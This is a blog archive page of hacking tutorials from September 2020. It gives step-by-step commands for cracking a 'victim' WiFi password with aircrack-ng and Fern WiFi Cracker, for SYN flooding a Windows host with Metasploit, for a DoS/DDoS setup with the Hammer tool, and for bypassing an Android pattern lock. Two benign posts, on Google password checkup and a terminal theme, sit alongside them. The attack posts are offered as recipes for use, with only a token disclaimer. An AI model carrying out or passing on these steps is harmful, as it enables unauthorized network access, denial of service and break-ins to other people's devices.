Skip to main content

Posts

Showing posts from September, 2020

how to hack wifi using aircrack-ng in kali linux

Aircrack-ng is one of the tools that kali has to crack wireless Step 1 : ifconfig wlan0 down Step 2 : iwconfig wlan0 mode managed Step 3 : ifconfig wlan0 up Step 4 : airmon-ng check wlan0 Step 5 : kill process or with trouble Step 6 : airmon-ng wlan0 Step 7 : airodump-ng wlan0 Step 8 : airodump-ng -c 6 -w SCAN_test --bssid(victim bssid) wlan0 Step 9 : aireplay-ng -1 0 -e (victim id name) -a CC:D1:S3:FE:GT:HH -h 00:cd:ca:45:df:gf wlan0 Step 10 : aireplay-ng -3 -b BSSID wlan0 Step 11 : aircrack-ng filename.cap Now password will be cracking After cracked we can see the password of victim wifi.. My Youtube channel video link :  https://youtu.be/XjvtJTA5FHo =========Thanks to visit my page=============

SYN Flooding a Target Host using Metasploit || Dos attack

 A SYN flood is a form of Dos attack in which an attacker sends a succession of SYN request to a target machine in an attempt to exhaust its resources and make it unresponsive to legitimate incoming traffic. Before Beginning task ensure that the firewall is turned off Step 1 : Open kali linux Step 2 : In this lab we are going to perform SYN flooding on the win 10 machine through port 21 Step 3 : Tyoe the command nmap -p 21 (ip address of win 10) and press enter Step 4 : The result returned by Nmap states that the port is open Step 5 : Type msfconsole from command line terminal and press enter to launch msfconsole Step 6 : Type the command use auxiliary/dos/tcp/synflood and press enter Step 7 : Now Type show option and press enter.These displays all the options with auxiliary module Step 8 : issue the following command set Rhost (ip address of windows 10) set Rport 21   Step 9 : To begin, type exploit and press enter Step 10 : Switch to the windows 10 machine, launch wireshark applicati

How to hack Wifi using fern wifi cracker

 Fern wifi cracker is one of the tool to crack wifi  First we should turn the wireless card into monitoring mode. To do this, Type below command "airmon-ng strat wlan0" in the terminal. Now open fern wifi cracker Step 1 : Application →click wireless attacks →Fern wifi cracker Step 2 : select wlan0  Step 3 : click "scan for access point" Step 4 : after finishing scan, it will show wireless network found. Step 5 : Click wifi wpa network as shown in the above screenshot.it will show wireless found.Generally in wpa n/w it performs Dictionary attack. Step 6 : click Browse and find the rockyou.txt to use for attack Step 7 : click Wifi attack Step 8 : After finishing the dictionary attack it found the password . --------------------------Thank you to visit my page--------------------------------------

How does google password checkup work

 Will check user saved password if they have been leaked and compromised in breaches at other service Step 1 : Open chrome browser Step 2 : Click three dots at right top corner and select "settings" option. Step 3 : Select "password" option Step 4 : Now you need to click on the ‘Check Passwords’ option Step 5: It will now scan whether your password has been leaked anywhere. If any of your saved passwords have been leaked or stolen, it will tell you. Note : Make sure to protect password should always...

How To Remove Pattern On Android Without Factory Reseting

Unlock Locked Pattern Without Losing Data!  Requirements: Aroma File Manager +A memory card for device. +Your android device must be either locked by pattern lock or password lock. How To Do it (Procedure)  Step 1. After you download “Aroma File Manager” place it in your card [SD CARD] Insert card into your locked android device. Step 2. Open Stock Recovery Mode by rebooting your android device and pressing PowerKey and VolumeUp key simultaneously. Different phones may have different methods to open stock recovery mode, so if you face any problems comment and i will give you the solution. Step 3. After entering into recovery mode use volume+ and volume- buttons to scroll up and down.For select use power button or home button. Step 4. From there click on “Install zip from SD Card” and navigate to where you placed “Aroma File Manager” click and install it. Step 5. After installing, it will open in recovery mode. Step 6. From the “Aroma File Manager” navigate to settings>>go to bott

DoS and DDOS ATTACK using Termux & Kali linux Penetration Testing Tool

What is Dos and DDoS? Dos : Attacker using single operating system to crack a server N-number of request to the server. DDos : Attacker using multiple operating system to crack a server multiple N-number of request to the server . Disclaimer : This is for informational and educational purposes only .   Download Termux App :  https://play.google.com/store/apps/details?id=com.termux Hammer Tool GitHub :  https://github.com/cyweb/hammer.git Steps to Install Termux step 1 : Open Termux step 2 : pkg update step 3 : pkg install python step 4 : pkg install python 2 step 5 : pkg install git step 6 : git clone https://github.com/cyweb/hammer.git step 7 : Now Hammer Tool Cloning  step 8 : Done After Successfully Installed Steps to Install Kali linux step 1 : Open Terminal step 2: apt-get install python step 3 :apt-get install python2 step 4 : apt-get install git step 5 : git clone https://github.com/cyweb/hammer.git step 6 : Now Hammer Tool Cloning  step 7 : Done After Successfully Installed Op

How to make a colorful terminal in kali linux

 Step 1: Download the theme using this link Download file : http://bit.ly/kali-theme Step 2 : open file manager then click view →show hidden files→click to choose→ now we have to see hidden files Step 3 : choose .bashrc to rename the file .bashrc-old Step 4 : now copy the downloaded theme in same folder →to rename the file parrot terminal theme to . bashrc Step 5 : now terminal changed colorful in sudo user and not the root user Step 6 : if you want to change the colorful theme in root user →steps are given below as same as sudo command Step 7 : choose root folder →then view option in top left →show hidden files→click to choose→ now we have to see hidden files Step 8 : choose .bashrc to rename the file .bashrc-old Step 9 : now copy the downloaded theme in same folder →to rename the file parrot terminal theme to . bashrc Step 10 : Finally changed colorful theme in root user ---------------------------------------------------------------------------------------------------------------